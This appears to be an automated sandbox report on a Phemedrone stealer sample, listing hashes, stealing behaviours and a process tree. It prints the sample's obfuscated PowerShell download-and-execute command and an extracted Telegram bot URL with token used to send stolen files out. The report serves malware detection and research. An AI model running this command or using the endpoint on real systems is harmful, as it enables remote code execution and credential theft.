Analysis
-
max time kernel
146s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
04-11-2024 08:35
Behavioral task
behavioral1
Sample
cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe
Resource
win10v2004-20241007-en
General
-
Target
cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe
-
Size
6.8MB
-
MD5
fb72ca714fe862deb161d3d443937314
-
SHA1
cc15d694a24ab347148d768c54b445690a107bac
-
SHA256
cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e
-
SHA512
1f2071b9da49b7813a5653dad076045acf692572d23c3e9b0ac3176046c6f56fa4b27b4d5bea4d7c69a06f8a8f95a58979c5777cb353d0ae05299287f721f413
-
SSDEEP
196608:R6Y8XMCHGLLc54i1wN+lPIcu9KYK39sI3PPJNMRRccx:6XMCHWUjqcuI3/PJNe
Malware Config
Extracted
phemedrone
https://api.telegram.org/bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument
Signatures
-
Phemedrone
An information and wallet stealer written in C#.
-
Phemedrone family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 9 4968 powershell.exe -
pid Process 4968 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4860 WDSecureUtil_609.exe -
Loads dropped DLL 2 IoCs
pid Process 3644 cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe 3644 cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Suspicious behavior: EnumeratesProcesses 30 IoCs
pid Process 4968 powershell.exe 4968 powershell.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe 4860 WDSecureUtil_609.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4968 powershell.exe Token: SeDebugPrivilege 4860 WDSecureUtil_609.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1536 wrote to memory of 3644 1536 cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe 84 PID 1536 wrote to memory of 3644 1536 cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe 84 PID 3644 wrote to memory of 1676 3644 cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe 85 PID 3644 wrote to memory of 1676 3644 cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe 85 PID 1676 wrote to memory of 4968 1676 cmd.exe 89 PID 1676 wrote to memory of 4968 1676 cmd.exe 89 PID 4968 wrote to memory of 4860 4968 powershell.exe 93 PID 4968 wrote to memory of 4860 4968 powershell.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe"C:\Users\Admin\AppData\Local\Temp\cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Users\Admin\AppData\Local\Temp\cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe"C:\Users\Admin\AppData\Local\Temp\cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando2'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script""3⤵
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando2'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Users\Admin\AppData\Roaming\WDSecureUtil_609.exe"C:\Users\Admin\AppData\Roaming\WDSecureUtil_609.exe" -pkek -aoa -y5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4860
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
117KB
MD5862f820c3251e4ca6fc0ac00e4092239
SHA1ef96d84b253041b090c243594f90938e9a487a9a
SHA25636585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153
SHA5122f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e
-
Filesize
82KB
MD5cb8c06c8fa9e61e4ac5f22eebf7f1d00
SHA1d8e0dfc8127749947b09f17c8848166bac659f0d
SHA256fc3b481684b926350057e263622a2a5335b149a0498a8d65c4f37e39dd90b640
SHA512e6da642b7200bfb78f939f7d8148581259baa9a5edda282c621d14ba88083a9b9bd3d17b701e9cde77ad1133c39bd93fc9d955bb620546bb4fcf45c68f1ec7d6
-
Filesize
271KB
MD5f3377f3de29579140e2bbaeefd334d4f
SHA1b3076c564dbdfd4ca1b7cc76f36448b0088e2341
SHA256b715d1c18e9a9c1531f21c02003b4c6726742d1a2441a1893bc3d79d7bb50e91
SHA51234d9591590bba20613691a5287ef329e5927a58127ce399088b4d68a178e3af67159a8fc55b4fcdcb08ae094753b20dec2ac3f0b3011481e4ed6f37445cecdd5
-
Filesize
62KB
MD532d76c9abd65a5d2671aeede189bc290
SHA10d4440c9652b92b40bb92c20f3474f14e34f8d62
SHA256838d5c8b7c3212c8429baf612623abbbc20a9023eec41e34e5461b76a285b86c
SHA51249dc391f4e63f4ff7d65d6fd837332745cc114a334fd61a7b6aa6f710b235339964b855422233fac4510ccb9a6959896efe880ab24a56261f78b2a0fd5860cd9
-
Filesize
154KB
MD51ba022d42024a655cf289544ae461fb8
SHA19772a31083223ecf66751ff3851d2e3303a0764c
SHA256d080eabd015a3569813a220fd4ea74dff34ed2a8519a10473eb37e22b1118a06
SHA5122b888a2d7467e29968c6bb65af40d4b5e80722ffdda760ad74c912f3a2f315d402f3c099fde82f00f41de6c9faaedb23a643337eb8821e594c567506e3464c62
-
Filesize
81KB
MD5fe896371430bd9551717ef12a3e7e818
SHA1e2a7716e9ce840e53e8fc79d50a77f40b353c954
SHA25635246b04c6c7001ca448554246445a845ce116814a29b18b617ea38752e4659b
SHA51267ecd9a07df0a07edd010f7e3732f3d829f482d67869d6bce0c9a61c24c0fdc5ff4f4e4780b9211062a6371945121d8883ba2e9e2cf8eb07b628547312dfe4c9
-
Filesize
1.3MB
MD5a9cbd0455b46c7d14194d1f18ca8719e
SHA1e1b0c30bccd9583949c247854f617ac8a14cbac7
SHA256df6c19637d239bfedc8cd13d20e0938c65e8fdf340622ff334db533f2d30fa19
SHA512b92468e71490a8800e51410df7068dd8099e78c79a95666ecf274a9e9206359f049490b8f60b96081fafd872ec717e67020364bcfa972f26f0d77a959637e528
-
Filesize
5.0MB
MD5123ad0908c76ccba4789c084f7a6b8d0
SHA186de58289c8200ed8c1fc51d5f00e38e32c1aad5
SHA2564e5d5d20d6d31e72ab341c81e97b89e514326c4c861b48638243bdf0918cfa43
SHA51280fae0533ba9a2f5fa7806e86f0db8b6aab32620dde33b70a3596938b529f3822856de75bddb1b06721f8556ec139d784bc0bb9c8da0d391df2c20a80d33cb04
-
Filesize
5.8MB
MD5b9de917b925dd246b709bb4233777efd
SHA1775f258d8b530c6ea9f0dd3d1d0b61c1948c25d2
SHA2560c0a66505093b6a4bb3475f716bd3d9552095776f6a124709c13b3f9552c7d99
SHA512f4bf3398f50fdd3ab7e3f02c1f940b4c8b5650ed7af16c626ccd1b934053ba73a35f96da03b349c1eb614bb23e0bc6b5cc58b07b7553a5c93c6d23124f324a33
-
Filesize
30KB
MD520831703486869b470006941b4d996f2
SHA128851dfd43706542cd3ef1b88b5e2749562dfee0
SHA25678e5994c29d8851f28b5b12d59d742d876683aea58eceea1fb895b2036cdcdeb
SHA5124aaf5d66d2b73f939b9a91e7eddfeb2ce2476c625586ef227b312230414c064aa850b02a4028363aa4664408c9510594754530a6d026a0a84be0168d677c1bc4
-
Filesize
693KB
MD50902d299a2a487a7b0c2d75862b13640
SHA104bcbd5a11861a03a0d323a8050a677c3a88be13
SHA2562693c7ee4fba55dc548f641c0cb94485d0e18596ffef16541bd43a5104c28b20
SHA5128cbef5a9f2d24da1014f8f1ccbddd997a084a0b04dd56bcb6ac38ddb636d05ef7e4ea7f67a085363aad3f43d45413914e55bdef14a662e80be955e6dfc2feca3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
246KB
MD5e082366c147031e7aaf6ca47a0110ad3
SHA151223ecf048edf1627f0f182e923922ff19bbb28
SHA256607d41c88298d5fdd3624d6ba7a7ae36f7cd90b20bc03390977740fed8b4065d
SHA512cd91e9852e886451245855ccbc370c6b81cddb6461277f325fabedf0b8fa7d473e582094b66be099266942e9baa18c908a7c6d0db80128dd946a56be0e70ac7f